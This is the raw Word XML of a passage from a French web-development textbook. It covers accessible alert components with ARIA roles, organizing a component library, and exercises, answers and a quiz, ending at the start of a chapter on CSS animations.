        </w:rPr>
        <w:t>Une alerte structurée et annoncée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&lt;div class="alerte alerte--erreur" role="alert"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;svg aria-hidden="true" class="alerte__icone"&gt;…&lt;/svg&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p class="alerte__titre"&gt;Le paiement a échoué&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;p&gt;Votre carte a été refusée. Vérifiez les informations ou essayez un autre</w:t>
        <w:br/>
        <w:t xml:space="preserve">       moyen de paiement.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.51 — Quatre niveaux d'alerte et leur annonce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45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295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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>role="status"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message non urgent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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role="status"</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Confirmation d'action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>role="alert"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interruption immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Avertissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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role="status"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + icône</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Risque à venir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une alerte lisible, avec un titre et un corps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.alerte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: .75rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-start: 4px solid;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.alerte--erreur { background: #f7ecea; border-color: #a63a32; color: #5c1f1a;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>.alerte--succes { background: #eaf3ee; border-color: #2f7d5b; color: #17432f;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>.alerte__titre { margin: 0 0 .25rem; font-weight: 700; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.6 Organiser une bibliothèque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une bibliothèque de composants documente ce qui existe pour éviter les réinventions. Trois éléments y figurent toujours : l'usage prévu, les exemples et les limites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une documentation intégrée au fichier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w:t>
        <w:br/>
        <w:t xml:space="preserve">   Bouton</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Usage : action ponctuelle. Jamais pour un lien de navigation.</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Variantes : --principal, --discret, --danger</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Tailles : --petit, (défaut), --large</w:t>
        <w:br/>
        <w:t xml:space="preserve">   États : hover, focus-visible, active, disabled, aria-busy</w:t>
        <w:br/>
        <w:t>========================================================================== */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une page de démonstration versionnée avec le projet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 page composants.html : la bibliothèque vivante --&gt;</w:t>
        <w:br/>
        <w:t>&lt;section id="boutons"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Boutons&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;&lt;button class="bouton"&gt;Principal&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     &lt;button class="bouton bouton--discret"&gt;Discret&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     &lt;button class="bouton bouton--danger"&gt;Danger&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     &lt;button class="bouton" disabled&gt;Désactivé&lt;/button&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/section&gt;</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UN COMPOSANT N'ENTRE DANS LA BIBLIOTHÈQUE QUE S'IL EST VÉRIFIÉ</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Il a été testé au clavier.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Il tient sur un écran de 320 pixels.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Il fonctionne en mode sombre.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Il ne dépend pas d'une image pour être compris.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Son code tient en moins de trente lignes.</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composant est un rôle réutilisable, pas une apparence.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Sept états au minimum pour un élément interactif.</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bouton désactivé sans explication laisse l'utilisateur sans recours.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variantes se nomment par intention, pas par couleur.</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composant doit rester compréhensible hors contexte.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alertes portent un rôle ARIA adapté à leur niveau.</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bibliothèque documentée évite la réinvention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les composants sont en place. Le chapitre suivant leur donne du mouvement : transitions, animations et respect des préférences.</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15.1 — Compléter une carte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Une carte d'article n'a ni étiquette, ni date accessible, ni lien nommé.</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Ajoutez une étiquette de catégorie.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 xml:space="preserve">Balisez la date avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datetime</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Donnez un nom explicite au lien du titre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 15.2 — Concevoir une alerte de formulaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le formulaire renvoie trois erreurs de champs. Concevez le message.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Le message est-il annoncé immédiatement ?</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Chaque erreur renvoie-t-elle au champ concerné ?</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Les données saisies sont-elles conservées ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 15.3 — Auditer une bibliothèque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Listez les composants de votre projet et vérifiez leur documentation.</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Repérez les composants dupliqués.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Vérifiez les états de chacun.</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Documentez trois composants manquants.</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15.1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&lt;article class="carte"&gt;</w:t>
        <w:br/>
        <w:t>&lt;img class="carte__image" src="images/css-grid.webp" alt="" width="800"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    height="450"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="carte__corps"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p class="carte__etiquette"&gt;&lt;a href="/css"&gt;CSS&lt;/a&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;h2 class="carte__titre"&gt;&lt;a href="/articles/css-grid"&gt;Comprendre CSS Grid en</w:t>
        <w:br/>
        <w:t xml:space="preserve">      pratique&lt;/a&gt;&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t>&lt;p class="carte__resume"&gt;Sept exemples commentés pour remplacer les mises en</w:t>
        <w:br/>
        <w:t xml:space="preserve">      page fragiles.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p class="carte__meta"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Publié le &lt;time datetime="2026-11-12"&gt;12 novembre 2026&lt;/time&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La date lisible peut différer de la valeur machine (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2026-11-12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) : l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fournit la forme normalisée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le libellé du lien est le titre de l'article : il reste compréhensible lorsqu'il est extrait de la page et listé par un lecteur d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 15.2</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&lt;div class="alerte alerte--erreur" role="alert" tabindex="-1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2 class="alerte__titre"&gt;3 champs nécessitent votre attention&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="#email"&gt;L'adresse électronique est incomplète.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;li&gt;&lt;a href="#mdp"&gt;Le mot de passe doit contenir au moins 12</w:t>
        <w:br/>
        <w:t xml:space="preserve">      caractères.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="#cgv"&gt;Vous devez accepter les conditions.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role="alert"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclenche une annonce immédiate. Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex="-1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de déplacer le focus sur le message après l'envoi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque erreur est un lien vers le champ concerné : l'utilisateur corrige sans chercher. Les valeurs déjà saisies restent affichées pour éviter la double saisie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 15.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les doublons typiques : deux styles de bouton secondaire, deux sortes d'alerte, deux cartes légèrement différentes. Fusionner réduit le code et les incohérences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un composant sans état </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>focus-visible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ni </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas prêt pour la production, même s'il est joli en démonstration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La documentation minimale tient en trois lignes par composant : rôle, variantes, accessible ou non au clavier.</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 attribut ARIA pour une erreur qui doit être annoncée immédiatement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role="status"</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role="alert"</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aria-live="off"</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role="log"</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Quelle affirmation décrit une variante de composant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 composant différent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Une modification d'un composant existant par une classe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Une duplication du HTML</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Un composant réservé au mobile</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 doit faire un bouton désactivé pour rester compréhensible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Rien, il est grisé</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Expliquer pourquoi il est indisponible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Disparaître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Changer de couleur</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Où placer le lien d'une carte pour un nom accessible explicite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 xml:space="preserve">Sur toute la carte via un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>div</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Sur le titre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Sur l'image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Nulle part</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Combien d'états minimum pour un bouton de qualité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Deux</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Trois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Cinq (normal, survol, focus, actif, désactivé)</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Un</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role="alert"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspond à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-live="assertive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : l'annonce interrompt le lecteur d'écran.</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La variante modifie une dimension du composant (taille, intention) sans en changer le rôle.</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Sans explication, l'utilisateur ne comprend pas ce qui manque pour activer l'action.</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Le lien sur le titre donne un nom explicite ; on peut étendre la zone cliquable avec un pseudo-élément.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les cinq états couvrent les usages souris, clavier et les indisponibilités.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>16. Transitions et animations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le mouvement guide l'attention, signale un changement d'état et raconte une relation de cause à effet. À petite dose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Intermédiaire · Prérequis : chapitre 15</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Distinguer transition, transformation et animation.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Animer les propriétés qui ne déclenchent pas de recalcul de mise en page.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Respecter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>prefers-reduced-motion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
